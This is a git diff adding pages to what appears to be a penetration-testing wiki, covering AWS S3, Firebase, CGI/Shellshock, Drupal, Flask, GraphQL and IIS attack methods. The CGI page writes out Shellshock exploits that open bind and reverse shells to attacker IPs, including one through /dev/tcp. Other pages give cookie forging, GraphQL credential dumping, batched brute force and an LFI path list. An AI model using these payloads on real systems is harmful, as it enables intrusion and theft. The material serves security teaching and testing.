+**Learn about AWS-S3 misconfiguration here:** [ **http://flaws.cloud**](%20http://flaws.cloud) **and** [**http://flaws2.cloud/**](http://flaws2.cloud/) **\(Most of the information here has been take from those resources\)**
+
+#### **Regions**
+
+* US Standard = http://s3.amazonaws.com
+* Ireland = http://s3-eu-west-1.amazonaws.com
+* Northern California = http://s3-us-west-1.amazonaws.com
+* Singapore = http://s3-ap-southeast-1.amazonaws.com
+* Tokyo = http://s3-ap-northeast-1.amazonaws.com
+
+## AWS Configuration
+
+Prerequisites, at least you need awscli
+
+```text
+sudo apt install awscli
+```
+
+You can get your credential here [https://console.aws.amazon.com/iam/home?\#/security\_credential](https://console.aws.amazon.com/iam/home?#/security_credential) but you need an aws account, free tier account : [https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/](https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/)
+
+```text
+aws configure --profile <PROFILE_NAME>
+AWSAccessKeyId=[ENTER HERE YOUR KEY]
+AWSSecretKey=[ENTER HERE YOUR KEY]
+```
+
+Alternatively you can use environment variables instead of creating a profile.
+
+```text
+export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
+export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
+export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
+```
+
+## Finding AWS Buckets used by the target
+
+Different methods to find when a webpage is using AWS to storage some resources:
+
+* Using wappalyzer browser plugin
+* Using BURP \(spidering the web\) or by manually navigating through the page all resources loaded will be save in the History.
+* Check for resources in domains like:
+
+  ```text
+  http://s3.amazonaws.com/[bucket_name]/
+  http://[bucket_name].s3.amazonaws.com/
+  ```
+
+Notice that a domain could be hiding some of this URLs for example `resources.domain.com --> bucket.s3.amazonaws.com`
+
+You can get the region of a bucket with a dig and nslookup:
+
+```text
+$ dig flaws.cloud
+;; ANSWER SECTION:
+flaws.cloud.    5    IN    A    52.218.192.11
+
+$ nslookup 52.218.192.11
+Non-authoritative answer:
+11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
+```
+
+Check that the resolved domain have the word "website".  
+You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`   
+or you can access the bucket visiting:  `flaws.cloud.s3-us-west-2.amazonaws.com`
+
+If you tries to access a bucket but in the domain name you specifies another region \(for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com` you will be redirected to the correct location.
+
+## Enumerating the bucket
+
+To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
+
+Open to everyone:
+
+![](../../../.gitbook/assets/image%20%2880%29.png)
+
+Private:
+
+![](../../../.gitbook/assets/image%20%2836%29.png)
+
+You can also check this with the `aws` tool: 
+
+```bash
+#Use --no-sign-request for check Everyones permissions
+#Use --profile <PROFILE_NAME> to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
+#--recursive if you want list recursivelyls 
+#Opcionally you can select the region if you now it
+aws s3 ls  s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
+```
+
+If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the hole AWSs3 domain. Example: `s3://<BUCKETNAME>`
+
+## Enumerating a AWS User
+
+If you find some private AWS keys, you can create a profile using those:
+
+```text
+aws configure --profile flawscloud
+```
+
+Notice that if you find a users credentials in the meta-data folder, you will need to add the _aws\_session\_token_ to the profile.
+
+### Get buckets
+
+And the check to which buckets this profile is related to \(may or may not have access to them\):
+
+```text
+aws s3 ls --profile flawscloud
+```
+
+![](../../../.gitbook/assets/image%20%2815%29.png)
+
+### User Information
+
+Check the **UserId, Account number** and **UserName** doing:
+
+```text
+aws --profile flawscloud sts get-caller-identity
+```
+
+![](../../../.gitbook/assets/image%20%28180%29.png)
+
+```text
+aws iam get-user --profile level6
+```
+
+![](../../../.gitbook/assets/image%20%28168%29.png)
+
+### Get User Policies
+
+```text
+aws iam list-attached-user-policies --profile <Profile> --user-name <UserName>
+```
+
+![](../../../.gitbook/assets/image%20%28194%29.png)
+
+To get information about a policy you first need the DefaultVersionId:
+
+```text
+aws iam get-policy --profile <PROFILE> --policy-arn <POLICY_ARN> #Example: arn:aws:iam::975426262029:policy/list_apigateways
+```
+
+![](../../../.gitbook/assets/image%20%28170%29.png)
+
+Now, you can see the policy:
+
+```text
+aws iam get-policy-version --profile level6 --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
+```
+
+![](../../../.gitbook/assets/image%20%28334%29.png)
+
+This means that you can access `GET arn:aws:apigateway:us-west-2::/restapis/*`
+
+Now it's time to find out possible lambda functions to execute:
+
+```text
+aws --region us-west-2 --profile level6 lambda list-functions
+```
+
+![](../../../.gitbook/assets/image%20%2871%29.png)
+
+A lambda function called "Level6" is available. Lets find out how to call it:
+
+```bash
+aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
+```
+
+![](../../../.gitbook/assets/image%20%28185%29.png)
+
+Now, that you know the name and the ID you can get the Name:
+
+```bash
+aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
+```
+
+![](../../../.gitbook/assets/image%20%2824%29.png)
+
+And finally call the function accessing \(notice that the ID, Name and functoin-name appears in the URL\): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
+
+### User privileges enumeration and privilege escalation
+
+Try the tool: [pacu](https://github.com/RhinoSecurityLabs/pacu)
+
+### Find and Download Elastic Container Registry
+
+```bash
+## Find
+aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
+## Download
+aws ecr get-login
+docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
+docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
+```
+
+### Get Snapshots
+
+Notice that ****AWS allows you to make snapshots of EC2's and databases \(RDS\). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords.
+
+Look for snapshots this user has access to \(note the **SnapshotId**\):
+
+```bash
+#This timeyou need to specify the region
+aws  ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
+```
+
+![](../../../.gitbook/assets/image%20%284%29.png)
+
+If you run that command without specifying the --owner-id you can see how many publicly available EC2 snapshots are.
+
+## Mounting an EC2 snapshot
+
+Create a copy of the backup:
+
+```bash
+aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89
+```
+
+**Mount it in a EC2 VM under your control** \(it has to be in the same region as the copy of the backup\):
+
+**step 1:** Head over to EC2 –&gt; Volumes and create a new volume of your preferred size and type.
+
+**Step 2:** Select the created volume, right click and select the “attach volume” option.
+
+**Step 3:** Select the instance from the instance text box as shown below.[![attach ebs volume](https://devopscube.com/wp-content/uploads/2016/08/ebs-volume.jpg)](https://devopscube.com/wp-content/uploads/2016/08/ebs-volume.jpg)
+
+**Step 4:** Now, login to your ec2 instance and list the available disks using the following command.
+
+```text
+lsblk
+```
+
+The above command will list the disk you attached to your instance.
+
+**Step5:**
+
+![](../../../.gitbook/assets/image%20%28304%29.png)
+
+## SSRF attacks through AWS
+
+If you want to read about how can you exploit meta-data in AWS [you should read this page](../../../pentesting-web/ssrf-server-side-request-forgery.md#abusing-ssrf-in-aws-environment)
+
+
+
+## Tools to scan the configuration of buckets **or to discover buckets**
+
+{% embed url="https://github.com/sa7mon/S3Scanner" %}
+
+{% embed url="https://github.com/kromtech/s3-inspector" %}
+
+{% embed url="https://github.com/jordanpotti/AWSBucketDump" %}
+
+{% embed url="https://github.com/hehnope/slurp" %}
+
+{% embed url="https://github.com/fellchase/flumberboozle" %}
+
+\*\*\*\*
+
+## **List of Open Buckets**
+
+{% embed url="https://buckets.grayhatwarfare.com/" %}
+
+\*\*\*\*
+
diff --git a/pentesting/pentesting-web/buckets/firebase-database.md b/pentesting/pentesting-web/buckets/firebase-database.md
new file mode 100644
index 00000000..3f69e016
--- /dev/null
+++ b/pentesting/pentesting-web/buckets/firebase-database.md
@@ -0,0 +1,29 @@
+# Firebase Database
+
+## What is Firebase
+
+Firebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end.
+
+### Pentest Methodology
+
+Therefore, some **Firebase endpoints** could be found in **mobile applications**. It is possible that the Firebase endpoint used is **configured badly grating everyone privileges to read \(and write\)** on it.
+
+This is the common methodology to search and exploit poorly configured Firebase databases:
+
+1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC. You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
+2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK.
+3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword
+4. You may find something like this URL “_**https://xyz.firebaseio.com/**_”
+5. Next, go to the browser and **navigate to the found URL**: _https://xyz.firebaseio.com/.json_
+6. 2 type of responses can appear:
+   1. “**Permission Denied**”: This means that you cannot access it, so it's well configured
+   2. “**null**” response or a bunch of **JSON data**: This means that the database is public and you at least have read access.
+      1. In this case, you could **check for writing privileges**, an exploit to test writing privileges can be found here: [https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit](https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit)
+
+**Interesting note**: When analysing a mobile application with **MobSF**, if it finds a firebase database it will check if this is **publicly available** and will notify it.
+
+## References
+
+* [https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)
+*  [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)
+
diff --git a/pentesting/pentesting-web/cgi.md b/pentesting/pentesting-web/cgi.md
new file mode 100644
index 00000000..3795ff0a
--- /dev/null
+++ b/pentesting/pentesting-web/cgi.md
@@ -0,0 +1,62 @@
+# CGI
+
+## Information
+
+The **CGI scripts are perl script**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \(`chmod +x`\) and **access** the reverse shell **from the web browser** to execute it.
+
+## **ShellShock**
+
+Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an **attacker can tack-on malicious code to the environment variable, which will run once the variable is received**.
+
+Exploiting this vulnerability the **page could throw an error**.
+
+You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
+
+#### **Test**
+
+Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
+
+**Nmap**
+
+```bash
+nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
+```
+
+#### **Curl \(refelcted and blind\)**
+
+```bash
+curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
+#Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
+curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
+```
+
+\*\*\*\*[**Shellsocker**](https://github.com/liamim/shellshocker)\*\*\*\*
+
+```bash
+python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
+```
+
+#### Exploit
+
+```bash
+#Bind Shell
+$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
+#Reverse shell
+$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
+#Reverse shell using curl
+curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
+#Reverse shell using metasploit
+> use multi/http/apache_mod_cgi_bash_env_exec
+> set targeturi /cgi-bin/admin.cgi
+> set rhosts 10.1.2.11
+> run
+```
+
+## **Proxy \(MitM to Web server requests\)**
+
+CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP\_HOST"="web.com"
+
+As the HTTP\_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP\_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+
+## 
+
diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md
new file mode 100644
index 00000000..c6e757a4
--- /dev/null
+++ b/pentesting/pentesting-web/drupal.md
@@ -0,0 +1,45 @@
+# Drupal
+
+## Username enumeration
+
+### Register
+
+In _/user/register_ just try to create a username and if the name is already taken it will be notified:
+
+![](../../.gitbook/assets/image%20%28248%29.png)
+
+### Request new password
+
+If you request a new password for an existing username:
+
+![](../../.gitbook/assets/image%20%28301%29.png)
+
+If you request a new password for a non-existent username:
+
+![](../../.gitbook/assets/image%20%2886%29.png)
+
+## Number of users enumeration
+
+Accessing _/user/&lt;number&gt;_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
+
+![](../../.gitbook/assets/image%20%2826%29.png)
+
+![](../../.gitbook/assets/image%20%28158%29.png)
+
+## Hidden pages enumeration
+
+**Fuzz `/node/$` where `$` is a number** \(from 1 to 500 for example\).  
+You could find **hidden pages** \(test, dev\) which are not referenced by the search engines.
+
+## Code execution inside Drupal with admin creds
+
+You need the **plugin php to be installed** \(check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**\)
+
+Go to _Modules_ -&gt; \(**Check**\) _PHP Filter_  -&gt; _Save configuration_
+
+![](../../.gitbook/assets/image%20%28247%29.png)
+
+Then click on _Add content_ -&gt; Select _Basic Page_ or _Article -_&gt; Write _php shellcode on the body_ -&gt; Select _PHP code_ in _Text format_ -&gt; Select _Preview_
+
+![](../../.gitbook/assets/image%20%28266%29.png)
+
diff --git a/pentesting/pentesting-web/flask.md b/pentesting/pentesting-web/flask.md
new file mode 100644
index 00000000..8602d495
--- /dev/null
+++ b/pentesting/pentesting-web/flask.md
@@ -0,0 +1,56 @@
+# Flask
+
+**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection.md)**.**
+
+## Cookies
+
+### Decoder
+
+Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
+
+#### Manual
+
+Get the first part of the cookie until the first point and Base64 decode it&gt;
+
+```text
+echo "ImhlbGxvIg" | base64 -d
+```
+
+The cookie is also signed using a password
+
+###  **Flask-Unsign**
+
+Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
+
+{% embed url="https://pypi.org/project/flask-unsign/" %}
+
+```text
+pip3 install flask-unsign
+```
+
+#### **Decode Cookie**
+
+```text
+flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
+```
+
+#### **Brute Force**
+
+```text
+flask-unsign --unsign --cookie < cookie.txt
+```
+
+#### **Signing**
+
+```text
+flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
+```
+
+#### Signing using legacy \(old versions\)
+
+```text
+flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
+```
+
+#### 
+
diff --git a/pentesting/pentesting-web/git.md b/pentesting/pentesting-web/git.md
new file mode 100644
index 00000000..d243aa9f
--- /dev/null
+++ b/pentesting/pentesting-web/git.md
@@ -0,0 +1,16 @@
+# Git
+
+If a _.git_ directory is found in a web application you can download all the content using _wget -r http://web.com/.git._ Then, you can see the changes made by using _git diff_.
+
+The tools: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) and [GitTools](https://github.com/internetwache/GitTools) can be used to retrieve the content of a git directory.
+
+The tool [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) can be used to search for CVEs and security vulnerability messages inside commits messages.
+
+The tool [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) search for sensitive data in the repositories of an organisations and its employees.
+
+ [Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is a command line-based tool that was written with a single goal: to help you discover GitHub secrets that developers accidentally made by pushing sensitive data. And like the others, it will help you find passwords, private keys, usernames, tokens and more.
+
+ [TruffleHog](https://github.com/dxa4481/truffleHog) searches through GitHub repositories and digs through the commit history and branches, looking for accidentally committed secrets
+
+Here you can find an study about github dorks: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks)
+
diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md
new file mode 100644
index 00000000..8560493e
--- /dev/null
+++ b/pentesting/pentesting-web/graphql.md
@@ -0,0 +1,130 @@
+# GraphQL
+
+## Introduction
+
+GraphQL is a data query language developed by Facebook and was released in 2015. GraphQL acts as an alternative to REST API. Rest APIs require the client to send multiple requests to different endpoints on the API to query data from the backend database. With graphQL you only need to send one request to query the backend. This is a lot simpler because you don’t have to send multiple requests to the API, a single request can be used to gather all the necessary information.
+
+## GraphQL
+
+As new technologies emerge so will new vulnerabilities. By **default** graphQL does **not** implement **authentication**, this is put on the developer to implement. This means by default graphQL allows anyone to query it, any sensitive information will be available to attackers unauthenticated.
+
+When performing your directory brute force attacks make sure to add the following paths to check for graphQL instances.
+
+* _/graphql_
+* _/graphiql_
+* _/graphql.php_
+* _/graphql/console_
+
+Once you find an open graphQL instance you need to know what queries it supports. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.**  
+_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…_graphql.org](https://graphql.org/learn/introspection/)
+
+### Basic Enumeration
+
+Graphql usually supports GET, POST \(x-www-form-urlencoded\) and POST\(json\).
+
+#### query={\_\_schema{types{name,fields{name}}}}
+
+With this query you will find the name of all the types being used:
+
+![](../../.gitbook/assets/image%20%28219%29.png)
+
+#### query={\_\_schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}
+
+With this query you can extract all the types, it's fields, and it's arguments \(and the type of the args\). This will be very useful to know how to query the database.
+
+![](../../.gitbook/assets/image%20%28287%29.png)
+
+#### Errors
+
+It's interesting to know if the **errors** are going to be **shown** as they will contribute with useful **information.**
+
+```text
+?query={__schema}
+?query={}
+?query={thisdefinitelydoesnotexist}
+```
+
+![](../../.gitbook/assets/image%20%28162%29.png)
+
+#### Enumerate Database Schema via Introspection
+
+```text
+fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
+```
+
+The last code line is a graphql query that will **dump all the meta-information** from the graphql \(_objects names, parameters, types..._\)
+
+![](../../.gitbook/assets/image%20%28159%29.png)
+
+### Quering
+
+Now that we know which kind of information is saved inside the database, let's try to **extract some values**.
+
+In our example there were 2 objects inside the "_Query_" type object: "_user_" and "_users_".  
+If these objects don't need any argument to search, could **retrieve all the information from them** just **asking** for the data you want. In this example from Internet you could extract the saved usernames and passwords:
+
+![](../../.gitbook/assets/image%20%28138%29.png)
+
+However, in this example if you try to do so you get this **error**:
+
+![](../../.gitbook/assets/image%20%2833%29.png)
+
+Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.  
+Anyway, we already knew that, in the [Basic Enumeration]() section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
+
+If you read the image provided when I run that query you will see that "_**user**_" had the **arg** "_**uid**_" of type _Int_.
+
+So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:  
+`query={user(uid:1){user,password}}`
+
+![](../../.gitbook/assets/image%20%28290%29.png)
+
+Note that I **discovered** that I could ask for the **parameters** "_**user**_" and "_**password**_" because if I try to look for something that doesn't exist \(`query={user(uid:1){noExists}}`\) I get this error:
+
+![](../../.gitbook/assets/image%20%28333%29.png)
+
+And during the **enumeration phase** I discovered that the "_**dbuser**_" object had as fields "_**user**_" and "_**password**_.
+
+#### Query string dump trick \(thanks to @BinaryShadow\_\)
+
+If you can search by a string type, like: `query={theusers(description: ""){username,password}}` and you **search for an empty string** it will **dump all data**. \(_Note this example isn't related with the example of the tutorials, for this example suppose you can search using "**theusers**" by a String field called "**description**"_\).
+
+GraphQL is a relatively new technology that is starting to gain some traction among startups and large corporations. Other than missing authentication by default graphQL endpoints can be vulnerable to other bugs such as IDOR.
+
+### Batching brute-force in 1 API request
+
+This information was take from [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).  
+Authentication through GraphQL API with **simultaneously sending many queries with different credentials** to check it. It’s a classic brute force attack, but now it’s possible to send more than one login/password pair per HTTP request because of the GraphQL batching feature. This approach would trick external rate monitoring applications into thinking all is well and there is no brute-forcing bot trying to guess passwords.
+
+Below you can find the simplest demonstration of an application authentication request, with **3 different email/passwords pairs at a time**. Obviously it’s possible to send thousands in a single request in the same way:
+
+![](../../.gitbook/assets/image%20%28245%29.png)
+
+ As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
+
+![](../../.gitbook/assets/image%20%2867%29.png)
+
+## Tools
+
+{% embed url="https://github.com/graphql/graphiql" %}
+
+{% embed url="https://github.com/swisskyrepo/GraphQLmap" %}
+
+Burp extension and tool: 
+
+{% embed url="https://altair.sirmuel.design/" %}
+
+{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" %}
+
+{% embed url="https://github.com/doyensec/inql" %}
+
+{% embed url="https://altair.sirmuel.design/" %}
+
+## References
+
+* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\*
+* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4)\*\*\*\*
+* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/)\*\*\*\*
+* \*\*\*\*[**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.m**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md)\*\*\*\*
+* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\*
+
diff --git a/pentesting/pentesting-web/h2-java-sql-database.md b/pentesting/pentesting-web/h2-java-sql-database.md
new file mode 100644
index 00000000..89f091e3
--- /dev/null
+++ b/pentesting/pentesting-web/h2-java-sql-database.md
@@ -0,0 +1,16 @@
+# H2 - Java SQL database
+
+Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
+
+### Tricks
+
+You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** \(**unauthenticated**\):
+
+![](../../.gitbook/assets/image%20%28342%29.png)
+
+Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
+
+![](../../.gitbook/assets/image%20%2837%29.png)
+
+_**Tricks from box Hawk of HTB.**_
+
diff --git a/pentesting/pentesting-web/iis-internet-information-services.md b/pentesting/pentesting-web/iis-internet-information-services.md
new file mode 100644
index 00000000..5f399716
--- /dev/null
+++ b/pentesting/pentesting-web/iis-internet-information-services.md
@@ -0,0 +1,157 @@
+# IIS - Internet Information Services
+
+Test executable file extensions:
+
+* asp
+* aspx
+* config
+* php
+
+## Internal IP Address disclosure
+
+On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
+
+```text
+nc -v domain.com 80
+openssl s_client -connect domain.com:443
+```
+
+Response disclosing the internal IP:
+
+```text
+GET / HTTP/1.0       
+
+HTTP/1.1 302 Moved Temporarily
+Cache-Control: no-cache
+Pragma: no-cache
+Location: https://192.168.5.237/owa/
+Server: Microsoft-IIS/10.0
+X-FEServer: NHEXCHANGE2016
+
+```
+
+## Execute .config files
+
+You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20insecure%20files/Configuration%20IIS%20web.config/web.config)
+
+More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
+
+## IIS HTTP Bruteforce
+
+Download the list that I have created: 
+
+{% file src="../../.gitbook/assets/iisfinal.txt" %}
+
+It was created merging the contents of the following lists:
+
+[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)  
+[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)  
+[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)  
+[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)  
+[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)  
+[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
+
+Use it without adding any extension, the files that need it have it already.
+
+## Local File Inclusion list
+
+From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
+
+```text
+C:\Apache\conf\httpd.conf
+C:\Apache\logs\access.log
+C:\Apache\logs\error.log
+C:\Apache2\conf\httpd.conf
+C:\Apache2\logs\access.log
+C:\Apache2\logs\error.log
+C:\Apache22\conf\httpd.conf
+C:\Apache22\logs\access.log
+C:\Apache22\logs\error.log
+C:\Apache24\conf\httpd.conf
+C:\Apache24\logs\access.log
+C:\Apache24\logs\error.log
+C:\Documents and Settings\Administrator\NTUser.dat
+C:\php\php.ini
+C:\php4\php.ini
+C:\php5\php.ini
+C:\php7\php.ini
+C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
+C:\Program Files (x86)\Apache Group\Apache\logs\access.log
+C:\Program Files (x86)\Apache Group\Apache\logs\error.log
+C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
+C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
+C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
+c:\Program Files (x86)\php\php.ini"
+C:\Program Files\Apache Group\Apache\conf\httpd.conf
+C:\Program Files\Apache Group\Apache\conf\logs\access.log
+C:\Program Files\Apache Group\Apache\conf\logs\error.log
+C:\Program Files\Apache Group\Apache2\conf\httpd.conf
+C:\Program Files\Apache Group\Apache2\conf\logs\access.log
+C:\Program Files\Apache Group\Apache2\conf\logs\error.log
+C:\Program Files\FileZilla Server\FileZilla Server.xml
+C:\Program Files\MySQL\my.cnf
